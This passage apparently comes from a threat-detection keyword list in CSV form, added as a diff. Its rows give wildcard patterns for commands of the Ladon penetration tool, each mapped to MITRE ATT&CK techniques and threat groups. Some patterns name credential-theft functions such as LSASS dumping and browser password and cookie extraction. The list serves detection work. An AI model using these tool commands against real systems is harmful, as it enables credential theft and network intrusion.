loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*Ladon Clslog*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*Ladon CmdDll *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*Ladon cmdline*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*Ladon CVE-*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*Ladon DirList*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*Ladon DraytekExp*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*Ladon DumpLsass*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*Ladon EnableDotNet*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon EnumProcess*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon EnumShare*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon Exploit*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon FindIP *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon FirefoxCookie*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon FirefoxHistory*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon FirefoxPwd*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon ForExec *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon FtpDownLoad *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon FtpServer *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon GetDomainIP*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon gethtml *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
